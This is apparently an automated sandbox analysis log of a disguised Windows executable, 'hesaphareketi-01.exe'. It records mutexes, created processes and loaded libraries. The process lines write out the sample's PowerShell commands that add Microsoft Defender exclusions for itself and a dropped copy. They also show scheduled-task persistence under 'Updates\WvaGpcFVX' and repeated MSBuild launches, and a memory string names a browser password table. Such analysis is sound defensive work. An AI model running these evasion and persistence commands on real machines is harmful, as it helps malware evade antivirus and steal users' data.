Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Mutant created: \Sessions\1\BaseNamedObjects\NzbfBFmzGTQOiqKUYiIo
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6556:120:WilError_03

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File created: C:\Users\user\AppData\Local\Temp\tmp470C.tmp

Jump to behavior

Source: hesaphareketi-01.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hesaphareketi-01.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000009.00000002.4703980721.0000000003D20000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002EE2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002F18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002ED3000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.4701100037.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003076000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003082000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003030000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.000000000304E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.4701852091.0000000003040000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: hesaphareketi-01.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\hesaphareketi-01.exe

File read: C:\Users\user\Desktop\hesaphareketi-01.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\hesaphareketi-01.exe "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe C:\Users\user\AppData\Roaming\WvaGpcFVX.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WvaGpcFVX.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp470C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WvaGpcFVX" /XML "C:\Users\user\AppData\Local\Temp\tmp5A94.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hesaphareketi-01.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\WvaGpcFVX.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
